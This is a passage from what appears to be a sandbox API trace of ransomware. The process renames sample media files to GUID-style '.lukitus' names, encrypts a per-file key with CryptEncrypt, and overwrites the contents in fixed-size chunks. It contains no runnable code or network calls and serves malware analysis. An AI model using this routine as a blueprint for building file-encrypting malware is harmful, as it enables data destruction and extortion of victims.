lDistanceToMove=2097152, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x200000 [0109.863] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.864] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.865] SetFilePointer (in: hFile=0x328, lDistanceToMove=2621440, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x280000 [0109.865] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.866] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.875] SetFilePointer (in: hFile=0x328, lDistanceToMove=3145728, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x300000 [0109.875] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.876] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x6c5d2, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x6c5d2, lpOverlapped=0x0) returned 1 [0109.877] SetFilePointer (in: hFile=0x328, lDistanceToMove=3670016, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x380000 [0109.877] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x6c5d2, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x6c5d2, lpOverlapped=0x0) returned 1 [0109.877] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0109.878] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x6583a570, dwHighDateTime=0x1d31760)) [0109.878] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0109.878] FlushFileBuffers (hFile=0x328) returned 1 [0109.912] GetFileAttributesExW (in: lpFileName="c:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be38a97, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x49e459)) returned 1 [0109.913] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.913] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.913] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.913] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.913] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.913] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.913] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.913] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.913] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.913] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.913] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.913] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.913] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.913] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.913] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.913] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.913] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.913] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.913] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.913] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0109.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0109.913] CreateFileW (lpFileName="c:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0109.913] MoveFileExW (lpExistingFileName="c:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3"), lpNewFileName="c:\\Users\\Public\\Music\\Sample Music\\F56924BE-9663-41BB-ADC81CE2-94215817FAE5.lukitus" (normalized: "c:\\users\\public\\music\\sample music\\f56924be-9663-41bb-adc81ce2-94215817fae5.lukitus"), dwFlags=0x9) returned 1 [0109.916] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0109.916] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0109.921] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.939] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0109.939] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.940] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.962] SetFilePointer (in: hFile=0x328, lDistanceToMove=524288, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x80000 [0109.962] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.963] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.029] SetFilePointer (in: hFile=0x328, lDistanceToMove=1048576, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x100000 [0110.029] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.030] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.070] SetFilePointer (in: hFile=0x328, lDistanceToMove=1572864, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x180000 [0110.070] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.073] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.086] SetFilePointer (in: hFile=0x328, lDistanceToMove=2097152, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x200000 [0110.086] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.087] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.106] SetFilePointer (in: hFile=0x328, lDistanceToMove=2621440, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x280000 [0110.106] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.111] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.120] SetFilePointer (in: hFile=0x328, lDistanceToMove=3145728, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x300000 [0110.120] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.121] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.122] SetFilePointer (in: hFile=0x328, lDistanceToMove=3670016, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x380000 [0110.122] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.123] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.129] SetFilePointer (in: hFile=0x328, lDistanceToMove=4194304, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x400000 [0110.129] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.129] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x1e459, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x1e459, lpOverlapped=0x0) returned 1 [0110.130] SetFilePointer (in: hFile=0x328, lDistanceToMove=4718592, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x480000 [0110.130] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x1e459, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x1e459, lpOverlapped=0x0) returned 1 [0110.130] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0110.130] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x65a9bb70, dwHighDateTime=0x1d31760)) [0110.130] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0110.130] FlushFileBuffers (hFile=0x328) returned 1 [0110.171] GetFileAttributesExW (in: lpFileName="c:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80282235, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bda0516, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be12937, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x1907b8a)) returned 1 [0110.171] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.171] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.171] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.171] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.171] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.171] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.171] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.171] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.171] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.171] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.171] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.171] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.171] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.171] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.171] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.171] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.172] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.172] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.172] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.172] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0110.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0110.172] CreateFileW (lpFileName="c:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0110.172] MoveFileExW (lpExistingFileName="c:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv"), lpNewFileName="c:\\Users\\Public\\Videos\\Sample Videos\\F56924BE-9663-41BB-4B442157-696184C15ED5.lukitus" (normalized: "c:\\users\\public\\videos\\sample videos\\f56924be-9663-41bb-4b442157-696184c15ed5.lukitus"), dwFlags=0x9) returned 1 [0110.174] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0110.174] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0110.178] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.193] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0110.193] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.197] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.199] SetFilePointer (in: hFile=0x328, lDistanceToMove=524288, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x80000 [0110.199] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.199] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.208] SetFilePointer (in: hFile=0x328, lDistanceToMove=1048576, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x100000 [0110.208] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.209] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.211] SetFilePointer (in: hFile=0x328, lDistanceToMove=1572864, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x180000 [0110.211] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.212] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.231] SetFilePointer (in: hFile=0x328, lDistanceToMove=2097152, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x200000 [0110.231] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.232] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.250] SetFilePointer (in: hFile=0x328, lDistanceToMove=2621440, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x280000 [0110.251] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.251] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.260] SetFilePointer (in: hFile=0x328, lDistanceToMove=3145728, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x300000 [0110.260] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.261] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.264] SetFilePointer (in: hFile=0x328, lDistanceToMove=3670016, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x380000 [0110.264] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.265] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.275] SetFilePointer (in: hFile=0x328, lDistanceToMove=4194304, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x400000 [0110.275] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.276] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, 